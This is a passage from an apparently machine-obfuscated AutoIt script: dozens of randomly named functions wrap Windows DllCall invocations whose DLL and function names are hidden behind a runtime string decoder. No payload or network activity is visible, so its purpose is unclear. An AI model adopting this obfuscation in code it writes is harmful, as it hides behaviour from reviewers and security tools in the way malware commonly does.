  3603.         Global $a5ee3310e44 = a2b00005424($os[3070]), $a55e3410018 = a2b00005424($os[3071]), $a2ae3513450 = a2b00005424($os[3072]), $a37e3612854 = a2b00005424($os[3073]), $a33e371472f = a2b00005424($os[3074]), $a2ce3810f5b = a2b00005424($os[3075]), $a1ce3915b26 = a2b00005424($os[3076]), $a2ee3a13825 = a2b00005424($os[3077]), $a26e3b1302e = a2b00005424($os[3078]), $a45e3c12a14 = a2b00005424($os[3079]), $a5fe3d1102c = a2b00005424($os[3080])
  3604.         Global $ssa5ab0605055 = 1
  3605.     EndIf
  3606.     Local $a505a20190d = DllCall($a5ee3310e44, $a55e3410018, $a2ae3513450, $a37e3612854, $a3eca000d54, $a33e371472f, $a22e3010c2f, $a2ce3810f5b, $a3f8d803d27, $a1ce3915b26, $a568d905c12, $a2ee3a13825, $a44e3113148, $a26e3b1302e, $a3ee3211e5f, $a45e3c12a14, $a103d00243d)
  3607.     If @error Then Return SetError(@error, @extended, False)
  3608.     Return $a505a20190d[Number($a5fe3d1102c)]
  3609. EndFunc
  3610.  
  3611. Func a46b070224a($a3eca000d54, $a1231714c22, $a5ce3e15541 = True)
  3612.     If NOT IsDeclared("SSA46B070224A") Then
  3613.         Global $a47e3f10b01 = a2b00005424($os[3081]), $a12f3012f2d = a2b00005424($os[3082]), $a08f3113451 = a2b00005424($os[3083]), $a52f3210e34 = a2b00005424($os[3084]), $a61f3313505 = a2b00005424($os[3085]), $a36f3414749 = a2b00005424($os[3086]), $a11f3514315 = a2b00005424($os[3087])
  3614.         Global $ssa46b070224a = 1
  3615.     EndIf
  3616.     Local $a505a20190d = DllCall($a47e3f10b01, $a12f3012f2d, $a08f3113451, $a52f3210e34, $a3eca000d54, $a61f3313505, $a1231714c22, $a36f3414749, $a5ce3e15541)
  3617.     If @error Then Return SetError(@error, @extended, False)
  3618.     Return $a505a20190d[Number($a11f3514315)]
  3619. EndFunc
  3620.  
  3621. Func a30b080270a($a20f3611d03, $a0bf371000e, $a07f3810d44, $a63f3910f43 = 0)
  3622.     If NOT IsDeclared("SSA30B080270A") Then
  3623.         Global $a57f3a1593b = a2b00005424($os[3088]), $a04f3b12b28 = a2b00005424($os[3089]), $a1af3c14b0a = a2b00005424($os[3090]), $a4cf3d11c08 = a2b00005424($os[3091]), $a19f3e14543 = a2b00005424($os[3092]), $a2bf3f13b3a = a2b00005424($os[3093]), $a5a04010b3f = a2b00005424($os[3094]), $a0c04111925 = a2b00005424($os[3095]), $a0304211733 = a2b00005424($os[3096])
  3624.         Global $ssa30b080270a = 1
  3625.     EndIf
  3626.     Local $a505a20190d = DllCall($a57f3a1593b, $a04f3b12b28, $a1af3c14b0a, $a4cf3d11c08, $a20f3611d03, $a19f3e14543, $a0bf371000e, $a2bf3f13b3a, $a07f3810d44, $a5a04010b3f, $a63f3910f43)
  3627.     If @error Then Return SetError(@error, @extended, Number($a0c04111925))
  3628.     Return $a505a20190d[Number($a0304211733)]
  3629. EndFunc
  3630.  
  3631. Func a43b0902d06($a3eca000d54, $a09fd400f0d)
  3632.     If NOT IsDeclared("SSA43B0902D06") Then
  3633.         Global $a570431164e = a2b00005424($os[3097]), $a0704415221 = a2b00005424($os[3098]), $a0304510f5c = a2b00005424($os[3099]), $a1804615614 = a2b00005424($os[3100]), $a3c0471452c = a2b00005424($os[3101]), $a3e0481564d = a2b00005424($os[3102])
  3634.         Global $ssa43b0902d06 = 1
  3635.     EndIf
  3636.     Local $a505a20190d = DllCall($a570431164e, $a0704415221, $a0304510f5c, $a1804615614, $a3eca000d54, $a3c0471452c, $a09fd400f0d)
  3637.     If @error Then Return SetError(@error, @extended, False)
  3638.     Return $a505a20190d[Number($a3e0481564d)]
  3639. EndFunc
  3640.  
  3641. Func a33b0a01e02($a2904912a1d)
  3642.     If NOT IsDeclared("SSA33B0A01E02") Then
  3643.         Global $a5604a1423d = a2b00005424($os[3103]), $a4504b14010 = a2b00005424($os[3104]), $a6204c1170d = a2b00005424($os[3105]), $a0a04d11736 = a2b00005424($os[3106]), $a3404e1001f = a2b00005424($os[3107]), $a0004f14425 = a2b00005424($os[3108])
  3644.         Global $ssa33b0a01e02 = 1
  3645.     EndIf
  3646.     Local $a505a20190d = DllCall($a5604a1423d, $a4504b14010, $a6204c1170d, $a0a04d11736, $a2904912a1d)
  3647.     If @error Then Return SetError(@error, @extended, Number($a3404e1001f))
  3648.     Return $a505a20190d[Number($a0004f14425)]
  3649. EndFunc
  3650.  
  3651. Func a47b0b02b39($a09fd400f0d, $a0014011635 = True)
  3652.     If NOT IsDeclared("SSA47B0B02B39") Then
  3653.         Global $a2c14114d10 = a2b00005424($os[3109]), $a3f1421401b = a2b00005424($os[3110])
  3654.         Global $ssa47b0b02b39 = 1
  3655.     EndIf
  3656.     a3080c0075d(Number($a2c14114d10), $a3f1421401b, $a09fd400f0d)
  3657.     If $a0014011635 Then Exit
  3658. EndFunc
  3659.  
  3660. Func a0ab0c01353($a09fd400f0d)
  3661.     If NOT IsDeclared("SSA0AB0C01353") Then
  3662.         Global $a3114310f3e = a2b00005424($os[3111]), $a3d1441555c = a2b00005424($os[3112]), $a0514514d2f = a2b00005424($os[3113])
  3663.         Global $ssa0ab0c01353 = 1
  3664.     EndIf
  3665.     a3080c0075d(Number($a3114310f3e) + Number($a3d1441555c), $a0514514d2f, $a09fd400f0d)
  3666. EndFunc
  3667.  
  3668. Func a20b0d04152($a3eca000d54, $a6014615d2f = 5)
  3669.     If NOT IsDeclared("SSA20B0D04152") Then
  3670.         Global $a1114713f2b = a2b00005424($os[3114]), $a3f1481235f = a2b00005424($os[3115]), $a3b14911920 = a2b00005424($os[3116]), $a1914a15738 = a2b00005424($os[3117]), $a1914b14457 = a2b00005424($os[3118]), $a4f14c11e14 = a2b00005424($os[3119])
  3671.         Global $ssa20b0d04152 = 1
  3672.     EndIf
  3673.     Local $a505a20190d = DllCall($a1114713f2b, $a3f1481235f, $a3b14911920, $a1914a15738, $a3eca000d54, $a1914b14457, $a6014615d2f)
  3674.     If @error Then Return SetError(@error, @extended, False)
  3675.     Return $a505a20190d[Number($a4f14c11e14)]
  3676. EndFunc
  3677.  
  3678. Func a4ab0e05c09($a5771214535)
  3679.     If NOT IsDeclared("SSA4AB0E05C09") Then
  3680.         Global $a3a14d1112a = a2b00005424($os[3120]), $a5e14e11828 = a2b00005424($os[3121]), $a3b14f14d39 = a2b00005424($os[3122]), $a082401020e = a2b00005424($os[3123]), $a5624110656 = a2b00005424($os[3124]), $a1f24213839 = a2b00005424($os[3125]), $a1e24315d2d = a2b00005424($os[3126]), $a5b24410714 = a2b00005424($os[3127]), $a4924514b25 = a2b00005424($os[3128])
  3681.         Global $ssa4ab0e05c09 = 1
  3682.     EndIf
  3683.     Local $a505a20190d = DllCall($a3a14d1112a, $a5e14e11828, $a3b14f14d39, $a082401020e, $a5771214535, $a5624110656, "", $a1f24213839, Number($a1e24315d2d))
  3684.     If @error Then Return SetError(@error, @extended, "")
  3685.     Return SetExtended($a505a20190d[Number($a5b24410714)], $a505a20190d[Number($a4924514b25)])
  3686. EndFunc
  3687.  
  3688. Func a27b0f00607($a2b24611c0b)
  3689.     If NOT IsDeclared("SSA27B0F00607") Then
  3690.         Global $a3a24715154 = a2b00005424($os[3129]), $a1124811910 = a2b00005424($os[3130]), $a172491062e = a2b00005424($os[3131]), $a5824a15461 = a2b00005424($os[3132]), $a0824b13253 = a2b00005424($os[3133]), $a0024c10e5a = a2b00005424($os[3134]), $a2124d15304 = a2b00005424($os[3135])
  3691.         Global $ssa27b0f00607 = 1
  3692.     EndIf
  3693.     Local $a3e0e502f1b = DllCall($a3a24715154, $a1124811910, $a172491062e, $a5824a15461, $a2b24611c0b)
  3694.     If @error Then Return SetError(Number($a0824b13253), @extended, Number($a0024c10e5a))
  3695.     Return $a3e0e502f1b[Number($a2124d15304)]
  3696. EndFunc
  3697.  
  3698. Func a1fc000520d($a2b24611c0b)
  3699.     If NOT IsDeclared("SSA1FC000520D") Then
  3700.         Global $a2224e1572c = a2b00005424($os[3136]), $a5724f13631 = a2b00005424($os[3137]), $a3c34011525 = a2b00005424($os[3138]), $a3a34114e0c = a2b00005424($os[3139]), $a6234215f28 = a2b00005424($os[3140]), $a233431474a = a2b00005424($os[3141]), $a5234410b3b = a2b00005424($os[3142])
  3701.         Global $ssa1fc000520d = 1
  3702.     EndIf
  3703.     Local $a3e0e502f1b = DllCall($a2224e1572c, $a5724f13631, $a3c34011525, $a3a34114e0c, $a2b24611c0b)
  3704.     If @error Then Return SetError(Number($a6234215f28), @extended, Number($a233431474a))
  3705.     Return $a3e0e502f1b[Number($a5234410b3b)]
  3706. EndFunc
  3707.  
  3708. Func a38c010142e($a5e02113900)
  3709.     If NOT IsDeclared("SSA38C010142E") Then
  3710.         Global $a2734513933 = a2b00005424($os[3143])
  3711.         Global $ssa38c010142e = 1
  3712.     EndIf
  3713.     Return BitShift($a5e02113900, Number($a2734513933))
  3714. EndFunc
  3715.  
  3716. Func a2ac020013b($a2234614f2d, $a1434711f4b = 0, $a453481414d = 0, $a3034913e0a = 0)
  3717.     If NOT IsDeclared("SSA2AC020013B") Then
  3718.         Global $a1334a12f63 = a2b00005424($os[3144]), $a0b34b1214c = a2b00005424($os[3145]), $a3e34c1210f = a2b00005424($os[3146]), $a2334d15e3b = a2b00005424($os[3147]), $a1b34e1062a = a2b00005424($os[3148]), $a5a34f10d54 = a2b00005424($os[3149]), $a1544012142 = a2b00005424($os[3150]), $a414411052e = a2b00005424($os[3151])
  3719.         Global $ssa2ac020013b = 1
  3720.     EndIf
  3721.     Local $a505a20190d = DllCall($a1334a12f63, $a0b34b1214c, $a3e34c1210f, $a2334d15e3b, $a2234614f2d, $a1b34e1062a, $a1434711f4b, $a5a34f10d54, $a453481414d, $a1544012142, $a3034913e0a)
  3722.     If @error Then Return SetError(@error, @extended, False)
  3723.     Return $a505a20190d[Number($a414411052e)]
  3724. EndFunc
  3725.  
  3726. Func a2cc0302541()
  3727.     If NOT IsDeclared("SSA2CC0302541") Then
  3728.         Global $a3244414136 = a2b00005424($os[3152]), $a4944515421 = a2b00005424($os[3153]), $a1544615527 = a2b00005424($os[3154])
  3729.         Global $ssa2cc0302541 = 1
  3730.     EndIf
  3731.     Local $a4e4421023a, $a5e44313839
  3732.     $a4e4421023a = a5a40b0314e(Number($a3244414136))
  3733.     $a5e44313839 = Number($a4944515421) / a3640d00118($a4e4421023a, $a44eae04122)
  3734.     a08a0000035(Number($a1544615527), $a4e4421023a)
  3735.     Return $a5e44313839
  3736. EndFunc
  3737.  
  3738. Func a18c0403b43()
  3739.     If NOT IsDeclared("SSA18C0403B43") Then
  3740.         Global $a3644813d29 = a2b00005424($os[3155]), $a414491375f = a2b00005424($os[3156]), $a2944a15f5f = a2b00005424($os[3157])
  3741.         Global $ssa18c0403b43 = 1
  3742.     EndIf
  3743.     Local $a4e4421023a, $a3444710f37
  3744.     $a4e4421023a = a5a40b0314e(Number($a3644813d29))
  3745.     $a3444710f37 = Number($a414491375f) / a3640d00118($a4e4421023a, $a3cfa005a4a)
  3746.     a08a0000035(Number($a2944a15f5f), $a4e4421023a)
  3747.     Return $a3444710f37
  3748. EndFunc
  3749.  
  3750. Func a00c0503e3b($a4bfbd05013)
  3751.     If NOT IsDeclared("SSA00C0503E3B") Then
  3752.         Global $a4244b13b48 = a2b00005424($os[3158]), $a3644c13c04 = a2b00005424($os[3159]), $a0644d12100 = a2b00005424($os[3160]), $a5544e15353 = a2b00005424($os[3161]), $a0744f1103f = a2b00005424($os[3162])
  3753.         Global $ssa00c0503e3b = 1
  3754.     EndIf
  3755.     Local $a505a20190d = DllCall($a4244b13b48, $a3644c13c04, $a0644d12100, $a5544e15353, $a4bfbd05013)
  3756.     If @error Then Return SetError(@error, @extended, False)
  3757.     Return $a505a20190d[Number($a0744f1103f)]
  3758. EndFunc
  3759.  
  3760. Func a0cc0600f2f($a3eca000d54, $a0454014711, $a285411515b, $a3054211c36, $a5054315b45, $a2f54415a35, $a1654510912, $a0f5461413f, $a103d00243d)
  3761.     If NOT IsDeclared("SSA0CC0600F2F") Then
  3762.         Global $a0a54712941 = a2b00005424($os[3163]), $a505481374d = a2b00005424($os[3164]), $a2f54914339 = a2b00005424($os[3165]), $a4a54a14d55 = a2b00005424($os[3166]), $a5254b13b5e = a2b00005424($os[3167]), $a5e54c11432 = a2b00005424($os[3168]), $a2f54d13e44 = a2b00005424($os[3169]), $a5954e13933 = a2b00005424($os[3170]), $a2254f15506 = a2b00005424($os[3171]), $a3364010a24 = a2b00005424($os[3172]), $a3764115159 = a2b00005424($os[3173]), $a4d64212147 = a2b00005424($os[3174]), $a436431320b = a2b00005424($os[3175])
  3763.         Global $ssa0cc0600f2f = 1
  3764.     EndIf
  3765.     Local $a505a20190d = DllCall($a0a54712941, $a505481374d, $a2f54914339, $a4a54a14d55, $a3eca000d54, $a5254b13b5e, $a0454014711, $a5e54c11432, $a285411515b, $a2f54d13e44, $a3054211c36, $a5954e13933, $a5054315b45, $a2254f15506, $a2f54415a35, $a3364010a24, $a1654510912, $a3764115159, $a0f5461413f, $a4d64212147, $a103d00243d)
  3766.     If @error Then Return SetError(@error, @extended, False)
  3767.     Return $a505a20190d[Number($a436431320b)]
  3768. EndFunc
  3769.  
  3770. Func a06c0706114($a3eca000d54)
  3771.     If NOT IsDeclared("SSA06C0706114") Then
  3772.         Global $a3a64414342 = a2b00005424($os[3176]), $a486451584d = a2b00005424($os[3177]), $a2664610a23 = a2b00005424($os[3178]), $a2464715b4d = a2b00005424($os[3179]), $a3264815646 = a2b00005424($os[3180])
  3773.         Global $ssa06c0706114 = 1
  3774.     EndIf
  3775.     Local $a505a20190d = DllCall($a3a64414342, $a486451584d, $a2664610a23, $a2464715b4d, $a3eca000d54)
  3776.     If @error Then Return SetError(@error, @extended, False)
  3777.     Return $a505a20190d[Number($a3264815646)]
  3778. EndFunc
  3779.  
  3780. Func a20c0803856($a598f105931, $a21aee05411 = -1)
  3781.     If NOT IsDeclared("SSA20C0803856") Then
  3782.         Global $a3a64911541 = a2b00005424($os[3181]), $a0164a13b3e = a2b00005424($os[3182]), $a4b64b14326 = a2b00005424($os[3183]), $a4e64c15437 = a2b00005424($os[3184]), $a1964d14f3f = a2b00005424($os[3185]), $a5164e10943 = a2b00005424($os[3186])
  3783.         Global $ssa20c0803856 = 1
  3784.     EndIf
  3785.     Local $a505a20190d = DllCall($a3a64911541, $a0164a13b3e, $a4b64b14326, $a4e64c15437, $a598f105931, $a1964d14f3f, $a21aee05411)
  3786.     If @error Then Return SetError(@error, @extended, False)
  3787.     Return $a505a20190d[Number($a5164e10943)]
  3788. EndFunc
  3789.  
  3790. Func a09c0900d1b($a0a4ed03152, $a1264f15a08, $a5974010942 = False, $a21aee05411 = -1)
  3791.     If NOT IsDeclared("SSA09C0900D1B") Then
  3792.         Global $a3674115820 = a2b00005424($os[3187]), $a4574211413 = a2b00005424($os[3188]), $a4974311a3a = a2b00005424($os[3189]), $a0c74411436 = a2b00005424($os[3190]), $a2874515a04 = a2b00005424($os[3191]), $a0974613d12 = a2b00005424($os[3192]), $a3574710255 = a2b00005424($os[3193]), $a0f74813c24 = a2b00005424($os[3194]), $a3d74912241 = a2b00005424($os[3195])
  3793.         Global $ssa09c0900d1b = 1
  3794.     EndIf
  3795.     Local $a505a20190d = DllCall($a3674115820, $a4574211413, $a4974311a3a, $a0c74411436, $a0a4ed03152, $a2874515a04, $a1264f15a08, $a0974613d12, $a5974010942, $a3574710255, $a21aee05411)
  3796.     If @error Then Return SetError(@error, @extended, -Number($a0f74813c24))
  3797.     Return $a505a20190d[Number($a3d74912241)]
  3798. EndFunc
  3799.  
  3800. Func a4ac0a04c1c($a4774a1271d, $a21aee05411 = -1)
  3801.     If NOT IsDeclared("SSA4AC0A04C1C") Then
  3802.         Global $a6074b14f03 = a2b00005424($os[3196]), $a5174c14b3d = a2b00005424($os[3197]), $a3a74d14b0f = a2b00005424($os[3198]), $a4e74e10406 = a2b00005424($os[3199]), $a1774f13a5c = a2b00005424($os[3200]), $a308401022c = a2b00005424($os[3201]), $a4a84111537 = a2b00005424($os[3202])
  3803.         Global $ssa4ac0a04c1c = 1
  3804.     EndIf
  3805.     Local $a505a20190d = DllCall($a6074b14f03, $a5174c14b3d, $a3a74d14b0f, $a4e74e10406, $a4774a1271d, $a1774f13a5c, $a21aee05411)
  3806.     If @error Then Return SetError(@error, @extended, -Number($a308401022c))
  3807.     Return $a505a20190d[Number($a4a84111537)]
  3808. EndFunc
  3809.  
  3810. Func a3ec0b05a5d($a4084212516, $a1c42d14550 = 0, $a2e42e13f28 = True)
  3811.     If NOT IsDeclared("SSA3EC0B05A5D") Then
  3812.         Global $a578441571c = a2b00005424($os[3203]), $a5c84512e20 = a2b00005424($os[3204]), $a5184610800 = a2b00005424($os[3205]), $a5484713420 = a2b00005424($os[3206]), $a178481494f = a2b00005424($os[3207]), $a5e84915a58 = a2b00005424($os[3208]), $a3e84a15844 = a2b00005424($os[3209]), $a4384b1055a = a2b00005424($os[3210]), $a5184c12400 = a2b00005424($os[3211]), $a3784d1542f = a2b00005424($os[3212]), $a2684e15635 = a2b00005424($os[3213]), $a4884f10e32 = a2b00005424($os[3214]), $a239401200c = a2b00005424($os[3215]), $a4594113d1f = a2b00005424($os[3216]), $a1694210723 = a2b00005424($os[3217]), $a3194313636 = a2b00005424($os[3218]), $a2294414154 = a2b00005424($os[3219]), $a3c9451261d = a2b00005424($os[3220]), $a0894712430 = a2b00005424($os[3221]), $a2c94815628 = a2b00005424($os[3222]), $a6094913a0b = a2b00005424($os[3223]), $a5194a11048 = a2b00005424($os[3224]), $a2894b1150e = a2b00005424($os[3225]), $a0794c10f3a = a2b00005424($os[3226]), $a0c94d1483b = a2b00005424($os[3227]), $a2994e15a23 = a2b00005424($os[3228]), $a0694f10b25 = a2b00005424($os[3229]), $a1ca4014952 = a2b00005424($os[3230]), $a2aa4114b47 = a2b00005424($os[3231]), $a46a4211e5a = a2b00005424($os[3232]), $a5ba431243c = a2b00005424($os[3233]), $a49a441115c = a2b00005424($os[3234]), $a45a4510049 = a2b00005424($os[3235]), $a3aa461471f = a2b00005424($os[3236]), $a06a471180f = a2b00005424($os[3237]), $a3ba4815e3a = a2b00005424($os[3238]), $a3ea4915528 = a2b00005424($os[3239])
  3813.         Global $ssa3ec0b05a5d = 1
  3814.     EndIf
  3815.     Local $a4a84311114 = $a578441571c
  3816.     If NOT IsString($a4084212516) Then $a4a84311114 = $a5c84512e20
  3817.     Local $a505a20190d = DllCall($a5184610800, $a5484713420, $a178481494f, $a5e84915a58, $a1c42d14550, $a3e84a15844, Number($a4384b1055a), $a4a84311114, $a4084212516, $a5184c12400, -Number($a3784d1542f), $a2684e15635, Number($a4884f10e32), $a239401200c, Number($a4594113d1f), $a1694210723, Number($a3194313636), $a2294414154, Number($a3c9451261d))
  3818.     If @error Then Return SetError(@error, @extended, "")
  3819.     Local $a1d94616259 = DllStructCreate($a0894712430 & $a505a20190d[Number($a2c94815628)] & $a6094913a0b)
  3820.     $a505a20190d = DllCall($a5194a11048, $a2894b1150e, $a0794c10f3a, $a0c94d1483b, $a1c42d14550, $a2994e15a23, Number($a0694f10b25), $a4a84311114, $a4084212516, $a1ca4014952, -Number($a2aa4114b47), $a46a4211e5a, $a1d94616259, $a5ba431243c, $a505a20190d[Number($a49a441115c)], $a45a4510049, Number($a3aa461471f), $a06a471180f, Number($a3ba4815e3a))
  3821.     If @error Then Return SetError(@error, @extended, "")
  3822.     If $a2e42e13f28 Then Return DllStructGetData($a1d94616259, Number($a3ea4915528))
  3823.     Return $a1d94616259
  3824. EndFunc
  3825.  
  3826. Func a10c0c04e2a(ByRef $a4d1c401e56)
  3827.     If NOT IsDeclared("SSA10C0C04E2A") Then
  3828.         Global $a20a4a13916 = a2b00005424($os[3240]), $a12a4b13f2c = a2b00005424($os[3241]), $a34a4c12e2d = a2b00005424($os[3242]), $a35a4d13607 = a2b00005424($os[3243]), $a4aa4e14c1b = a2b00005424($os[3244]), $a47a4f15143 = a2b00005424($os[3245]), $a2cb4013b54 = a2b00005424($os[3246])
  3829.         Global $ssa10c0c04e2a = 1
  3830.     EndIf
  3831.     Local $a505a20190d = DllCall($a20a4a13916, $a12a4b13f2c, $a34a4c12e2d, $a35a4d13607, $a4d1c401e56)
  3832.     If @error Then Return SetError(Number($a4aa4e14c1b), @extended, Number($a47a4f15143))
  3833.     Return $a505a20190d[Number($a2cb4013b54)]
  3834. EndFunc
  3835.  
  3836. Func a5cc0d0443b($a37b4115b58, $a09fd400f0d)
  3837.     If NOT IsDeclared("SSA5CC0D0443B") Then
  3838.         Global $a04b421000e = a2b00005424($os[3247]), $a18b431072c = a2b00005424($os[3248]), $a28b441530c = a2b00005424($os[3249]), $a54b4514117 = a2b00005424($os[3250]), $a3eb4613b14 = a2b00005424($os[3251]), $a05b4711105 = a2b00005424($os[3252]), $a35b4811c2e = a2b00005424($os[3253]), $a19b4915b1e = a2b00005424($os[3254]), $a5fb4a14c47 = a2b00005424($os[3255]), $a1cb4b10e1e = a2b00005424($os[3256]), $a20b4c15a43 = a2b00005424($os[3257])
  3839.         Global $ssa5cc0d0443b = 1
  3840.     EndIf
  3841.     Local $a505a20190d = DllCall($a04b421000e, $a18b431072c, $a28b441530c, $a54b4514117, $a37b4115b58, $a3eb4613b14, $a09fd400f0d, $a05b4711105, StringLen($a09fd400f0d), $a35b4811c2e, Number($a19b4915b1e), $a5fb4a14c47, Number($a1cb4b10e1e))
  3842.     If @error Then Return SetError(@error, @extended, False)
  3843.     Return $a505a20190d[Number($a20b4c15a43)]
  3844. EndFunc
  3845.  
  3846. Func a1dc0e0372c($a28cec03a24, $a0dde500c4b, $a12b4d1173f, ByRef $a0cb4e15614, $a1960914250 = 0)
  3847.     If NOT IsDeclared("SSA1DC0E0372C") Then
  3848.         Global $a26b4f10842 = a2b00005424($os[3258]), $a27c4011523 = a2b00005424($os[3259]), $a63c4112a0b = a2b00005424($os[3260]), $a1dc421592c = a2b00005424($os[3261]), $a57c4316120 = a2b00005424($os[3262]), $a31c4410332 = a2b00005424($os[3263]), $a11c451322b = a2b00005424($os[3264]), $a01c4612e0e = a2b00005424($os[3265]), $a14c4716020 = a2b00005424($os[3266]), $a3fc481002e = a2b00005424($os[3267]), $a5cc4913e1d = a2b00005424($os[3268])
  3849.         Global $ssa1dc0e0372c = 1
  3850.     EndIf
  3851.     Local $a505a20190d = DllCall($a26b4f10842, $a27c4011523, $a63c4112a0b, $a1dc421592c, $a28cec03a24, $a57c4316120, $a0dde500c4b, $a31c4410332, $a12b4d1173f, $a11c451322b, Number($a01c4612e0e), $a14c4716020, $a1960914250)
  3852.     If @error Then Return SetError(@error, @extended, False)
  3853.     $a0cb4e15614 = $a505a20190d[Number($a3fc481002e)]
  3854.     Return $a505a20190d[Number($a5cc4913e1d)]
  3855. EndFunc
  3856.  
  3857. Func a3ec0f05e2f($a598f105931, $a11f2013b50, $a0dde500c4b, $a11de601b14, ByRef $a0cb4e15614, $a43c4a12a3b = "ptr")
  3858.     If NOT IsDeclared("SSA3EC0F05E2F") Then
  3859.         Global $a2dc4b13328 = a2b00005424($os[3269]), $a04c4c10832 = a2b00005424($os[3270]), $a08c4d1115c = a2b00005424($os[3271]), $a62c4e14636 = a2b00005424($os[3272]), $a4ec4f15a4d = a2b00005424($os[3273]), $a10d4012b33 = a2b00005424($os[3274]), $a23d4115c0d = a2b00005424($os[3275]), $a0cd4213c43 = a2b00005424($os[3276]), $a3ad4313a23 = a2b00005424($os[3277]), $a2ad4415b10 = a2b00005424($os[3278])
  3860.         Global $ssa3ec0f05e2f = 1
  3861.     EndIf
  3862.     Local $a505a20190d = DllCall($a2dc4b13328, $a04c4c10832, $a08c4d1115c, $a62c4e14636, $a598f105931, $a4ec4f15a4d, $a11f2013b50, $a43c4a12a3b, $a0dde500c4b, $a10d4012b33, $a11de601b14, $a23d4115c0d, Number($a0cd4213c43))
  3863.     If @error Then Return SetError(@error, @extended, False)
  3864.     $a0cb4e15614 = $a505a20190d[Number($a3ad4313a23)]
  3865.     Return $a505a20190d[Number($a2ad4415b10)]
  3866. EndFunc
  3867.  
  3868. Func a26d0003e3b($a5082710732, $a02d451235e, $a23d4611652, $a63d4713e38, $a2ad4812d0f = 0, $a1bd4913c14 = 0)
  3869.     If NOT IsDeclared("SSA26D0003E3B") Then
  3870.         Global $a39d4a10750 = a2b00005424($os[3279]), $a49d4b15b47 = a2b00005424($os[3280]), $a1fd4c1554f = a2b00005424($os[3281]), $a41d4d14905 = a2b00005424($os[3282]), $a3fd4e12918 = a2b00005424($os[3283]), $a5bd4f15c5d = a2b00005424($os[3284]), $a55e4012205 = a2b00005424($os[3285]), $a0ce411272a = a2b00005424($os[3286]), $a00e421470a = a2b00005424($os[3287]), $a06e4314044 = a2b00005424($os[3288]), $a2ce4410d31 = a2b00005424($os[3289]), $a3ae4515a2c = a2b00005424($os[3290])
  3871.         Global $ssa26d0003e3b = 1
  3872.     EndIf
  3873.     Local $a3e0e502f1b = DllCall($a39d4a10750, $a49d4b15b47, $a1fd4c1554f, $a41d4d14905, $a5082710732, $a3fd4e12918, $a02d451235e, $a5bd4f15c5d, $a23d4611652, $a55e4012205, $a63d4713e38, $a0ce411272a, $a2ad4812d0f, $a00e421470a, $a1bd4913c14)
  3874.     If @error Then Return SetError(Number($a06e4314044), @extended, False)
  3875.     Return NOT ($a3e0e502f1b[Number($a2ce4410d31)] = Number($a3ae4515a2c))
  3876. EndFunc
  3877.  
  3878. Func a60d0103113($a5082710732, $a31e461355a, $a08e4714708, $a02e4814353, $a4ce4910328, $a58e4a11c58, $a19e4b13c4d)
  3879.     If NOT IsDeclared("SSA60D0103113") Then
  3880.         Global $a30e4c1242d = a2b00005424($os[3291]), $a38e4d1181b = a2b00005424($os[3292]), $a55e4e1331d = a2b00005424($os[3293]), $a39e4f15134 = a2b00005424($os[3294]), $a4bf4015b63 = a2b00005424($os[3295]), $a1ff411223d = a2b00005424($os[3296]), $a3af4215d24 = a2b00005424($os[3297]), $a2ff4310b18 = a2b00005424($os[3298]), $a0bf441555f = a2b00005424($os[3299]), $a03f4514742 = a2b00005424($os[3300]), $a16f4611121 = a2b00005424($os[3301]), $a13f4715948 = a2b00005424($os[3302]), $a37f4810f16 = a2b00005424($os[3303]), $a56f4910103 = a2b00005424($os[3304]), $a02f4a15625 = a2b00005424($os[3305]), $a5af4b1264e = a2b00005424($os[3306])
  3881.         Global $ssa60d0103113 = 1
  3882.     EndIf
  3883.     Local $a3e0e502f1b = DllCall($a30e4c1242d, $a38e4d1181b, $a55e4e1331d, $a39e4f15134, $a5082710732, $a4bf4015b63, $a31e461355a, $a1ff411223d, Number($a3af4215d24), $a2ff4310b18, $a08e4714708, $a0bf441555f, $a02e4814353, $a03f4514742, Number($a16f4611121), $a13f4715948, $a4ce4910328, $a37f4810f16, $a58e4a11c58, $a56f4910103, $a19e4b13c4d)
  3884.     If @error OR NOT $a3e0e502f1b[Number($a02f4a15625)] Then Return SetError(Number($a5af4b1264e), @extended, False)
  3885.     Return True
  3886. EndFunc
  3887.  
  3888. Func a28d0200e09($a22f4c10a3b, $a010e304945, $a37f4d1354f, $a29f4e1321a)
  3889.     If NOT IsDeclared("SSA28D0200E09") Then
  3890.         Global $a3df4f13e5b = a2b00005424($os[3307]), $a0805015d26 = a2b00005424($os[3308]), $a0f05111c5a = a2b00005424($os[3309]), $a360521325d = a2b00005424($os[3310]), $a1705311231 = a2b00005424($os[3311]), $a2305413736 = a2b00005424($os[3312]), $a3a05511e43 = a2b00005424($os[3313]), $a070561441a = a2b00005424($os[3314]), $a3c0571351d = a2b00005424($os[3315]), $a1105812a0d = a2b00005424($os[3316]), $a1a05915848 = a2b00005424($os[3317]), $a4c05a12519 = a2b00005424($os[3318]), $a6005b1601b = a2b00005424($os[3319]), $a3505c13d29 = a2b00005424($os[3320]), $a2605d10f4b = a2b00005424($os[3321])
  3891.         Global $ssa28d0200e09 = 1
  3892.     EndIf
  3893.     Local $a3e0e502f1b = DllCall($a3df4f13e5b, $a0805015d26, $a0f05111c5a, $a360521325d, $a22f4c10a3b, $a1705311231, $a010e304945, $a2305413736, Number($a3a05511e43), $a070561441a, $a37f4d1354f, $a3c0571351d, $a29f4e1321a, $a1105812a0d, Number($a1a05915848))
  3894.     If @error OR NOT $a3e0e502f1b[Number($a4c05a12519)] Then Return SetError(Number($a6005b1601b), @extended, Number($a3505c13d29))
  3895.     Return $a3e0e502f1b[Number($a2605d10f4b)]
  3896. EndFunc
  3897.  
  3898. Func a26d0301d20($a5305e15d03, $a1505f14b4e = "")
  3899.     If NOT IsDeclared("SSA26D0301D20") Then
  3900.         Global $a3415110a0b = a2b00005424($os[3322]), $a0d15210a55 = a2b00005424($os[3323])
  3901.         Global $ssa26d0301d20 = 1
  3902.     EndIf
  3903.     Local $a1f15011a22 = a16d0805626($a5305e15d03, $a1505f14b4e)
  3904.     If @error Then Return SetError(@error, @extended, Number($a3415110a0b))
  3905.     If IsArray($a1f15011a22) Then Return a27e0201150($a1f15011a22[Number($a0d15210a55)])
  3906.     Return ""
  3907. EndFunc
  3908.  
  3909. Func a60d0400846($a1f1531195d)
  3910.     If NOT IsDeclared("SSA60D0400846") Then
  3911.         Global $a211541484f = a2b00005424($os[3324]), $a0615510e26 = a2b00005424($os[3325]), $a1815616358 = a2b00005424($os[3326]), $a0015710c0e = a2b00005424($os[3327]), $a0d15812e57 = a2b00005424($os[3328]), $a0a15915215 = a2b00005424($os[3329]), $a1515a15f0b = a2b00005424($os[3330]), $a5215b1471a = a2b00005424($os[3331]), $a2015c1072e = a2b00005424($os[3332])
